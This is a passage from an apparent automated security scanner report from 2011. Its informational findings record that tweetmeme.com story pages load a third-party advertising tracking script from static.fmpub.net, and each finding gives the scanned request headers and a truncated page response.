Host:   http://tweetmeme.com
Path:   /story/3703235206/office-365-for-education-leapfrogging-the-competition-whymicrosoft

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /story/3703235206/office-365-for-education-leapfrogging-the-competition-whymicrosoft HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:41:51 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0031750202178955
X-Served-In: 1.0388720035553
X-Served-By: h03
Content-Length: 41934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Off
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.424. http://tweetmeme.com/story/3829040762/i-me-mine-the-unholy-trinity-of-ayn-rand-tomfoolery

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /story/3829040762/i-me-mine-the-unholy-trinity-of-ayn-rand-tomfoolery

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /story/3829040762/i-me-mine-the-unholy-trinity-of-ayn-rand-tomfoolery HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:44:41 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.004019021987915
X-Served-In: 3.8936800956726
X-Served-By: h03
Content-Length: 41729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
I M
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.425. http://tweetmeme.com/story/3829268752/video-smack-fest-2011-in-queens-ny-2-girls-go-head-to-head-slapping-the-ish-out-each-other-for-2-000

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /story/3829268752/video-smack-fest-2011-in-queens-ny-2-girls-go-head-to-head-slapping-the-ish-out-each-other-for-2-000

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /story/3829268752/video-smack-fest-2011-in-queens-ny-2-girls-go-head-to-head-slapping-the-ish-out-each-other-for-2-000 HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:43:47 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0056359767913818
X-Served-In: 1.0372290611267
X-Served-By: ded2059
Content-Length: 41951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Vid
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.426. http://tweetmeme.com/story/3829489042/inhabitats-week-in-green-self-sustaining-airships-turbine-base-jumpers-and-the-saharas-solar-oasis-engadget

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /story/3829489042/inhabitats-week-in-green-self-sustaining-airships-turbine-base-jumpers-and-the-saharas-solar-oasis-engadget

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /story/3829489042/inhabitats-week-in-green-self-sustaining-airships-turbine-base-jumpers-and-the-saharas-solar-oasis-engadget HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:44:06 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0042719841003418
X-Served-In: 1.5734810829163
X-Served-By: ded2059
Content-Length: 42332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Inh
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.427. http://tweetmeme.com/story/3829652883/ny-jets-qb-picks-his-nose-wipes-it-on-teammate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /story/3829652883/ny-jets-qb-picks-his-nose-wipes-it-on-teammate

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /story/3829652883/ny-jets-qb-picks-his-nose-wipes-it-on-teammate HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:43:24 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0037190914154053
X-Served-In: 2.9209001064301
X-Served-By: ded2059
Content-Length: 38113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
NY
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.428. http://tweetmeme.com/story/3829698133/fear-this-says-the-pirate-bay-hinting-at-a-new-music-site

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /story/3829698133/fear-this-says-the-pirate-bay-hinting-at-a-new-music-site

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /story/3829698133/fear-this-says-the-pirate-bay-hinting-at-a-new-music-site HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:42:53 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0060100555419922
X-Served-In: 1.5006999969482
X-Served-By: h00
Content-Length: 41316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
&qu
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.429. http://tweetmeme.com/story/3829806161/the-associated-press-fitness-guru-jack-lalanne-96-dies-at-calif-home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /story/3829806161/the-associated-press-fitness-guru-jack-lalanne-96-dies-at-calif-home

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /story/3829806161/the-associated-press-fitness-guru-jack-lalanne-96-dies-at-calif-home HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:43:15 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0043668746948242
X-Served-In: 2.3485450744629
X-Served-By: ded2060
Content-Length: 41970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
The
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.430. http://tweetmeme.com/story/3829851328/kevin-durant-mendenhall-what-r-u-doing-son-twitvid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /story/3829851328/kevin-durant-mendenhall-what-r-u-doing-son-twitvid

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /story/3829851328/kevin-durant-mendenhall-what-r-u-doing-son-twitvid HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:39:31 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0032310485839844
X-Served-In: 3.227087020874
X-Served-By: ded2061
Content-Length: 41327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Kev
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.431. http://tweetmeme.com/story/3829911938/good-thing-for-green-tech-ge-chief-jeff-immelt-to-chair-obama-s-council-on-jobs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /story/3829911938/good-thing-for-green-tech-ge-chief-jeff-immelt-to-chair-obama-s-council-on-jobs

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /story/3829911938/good-thing-for-green-tech-ge-chief-jeff-immelt-to-chair-obama-s-council-on-jobs HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:43:11 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0037579536437988
X-Served-In: 3.8831679821014
X-Served-By: h03
Content-Length: 44932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Goo
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.432. http://tweetmeme.com/story/3830045531/jack-lalanne-dead-at-96-this-just-in-cnncom-blogs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /story/3830045531/jack-lalanne-dead-at-96-this-just-in-cnncom-blogs

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /story/3830045531/jack-lalanne-dead-at-96-this-just-in-cnncom-blogs HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:39:08 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0037209987640381
X-Served-In: 1.0409739017487
X-Served-By: ded2059
Content-Length: 41348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Jac
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.433. http://tweetmeme.com/story/3830307800/why-3d-doesn-t-work-and-never-will-case-closed-roger-eberts-journal

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /story/3830307800/why-3d-doesn-t-work-and-never-will-case-closed-roger-eberts-journal

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /story/3830307800/why-3d-doesn-t-work-and-never-will-case-closed-roger-eberts-journal HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:39:19 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0068228244781494
X-Served-In: 2.4784219264984
X-Served-By: h04
Content-Length: 35490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Why
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.434. http://tweetmeme.com/story/3831012837/day-2-is-a-wrap-hiam-video-coming-soon-britney-on-twitpic

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /story/3831012837/day-2-is-a-wrap-hiam-video-coming-soon-britney-on-twitpic

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /story/3831012837/day-2-is-a-wrap-hiam-video-coming-soon-britney-on-twitpic HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:40:42 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0033118724822998
X-Served-In: 3.4866709709167
X-Served-By: ded2061
Content-Length: 35539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Day
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.435. http://tweetmeme.com/story/3831183930/nsfw-on-the-internet-nobody-knows-you-re-a-journalist

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /story/3831183930/nsfw-on-the-internet-nobody-knows-you-re-a-journalist

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /story/3831183930/nsfw-on-the-internet-nobody-knows-you-re-a-journalist HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:42:07 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0068161487579346
X-Served-In: 4.5812108516693
X-Served-By: ded2062
Content-Length: 38663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
NSF
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.436. http://tweetmeme.com/story/3831192964/super-junior-s-heechul-lambastes-netizens-through-a-series-of-tweets

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /story/3831192964/super-junior-s-heechul-lambastes-netizens-through-a-series-of-tweets

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /story/3831192964/super-junior-s-heechul-lambastes-netizens-through-a-series-of-tweets HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:42:08 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0052130222320557
X-Served-In: 2.4108941555023
X-Served-By: h01
Content-Length: 35541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Sup
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.437. http://tweetmeme.com/story/3831576446/google-says-removing-reader-link-in-gmail-was-a-mistake-aims-to-bring-back-monday

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /story/3831576446/google-says-removing-reader-link-in-gmail-was-a-mistake-aims-to-bring-back-monday

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /story/3831576446/google-says-removing-reader-link-in-gmail-was-a-mistake-aims-to-bring-back-monday HTTP/1.1
Host: tweetmeme.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __ctl=286f8b371579253c1; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __csnv=2d2e35941c7237e0; tm_identity=1e736a4ffb2b89d8eb9feef196afe056; __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __utmc=229010307; __csref=; __cst=c361a3372a99df5c; __qca=P0-724637325-1295907700201; __utmb=229010307.2.10.1295907700; __csv=286f8b371579253c; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 25 Jan 2011 13:39:48 GMT
Content-Type: text/html
Connection: close
X-Ads-Served-In: 0.0057921409606934
X-Served-In: 0.078665971755981
X-Served-By: ded2062
Content-Length: 51429

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    <!-- title -->
   <title>
Goo
...[SNIP]...
<!-- FM Tracking Pixel -->
<script type='text/javascript' src='http://static.fmpub.net/site/tweetmeme'></script>
...[SNIP]...

21.438. http://tweetmeme.com/style/day

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /style/day

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.fmpub.net/site/tweetmeme

Request

GET /style/day HTTP/1.1
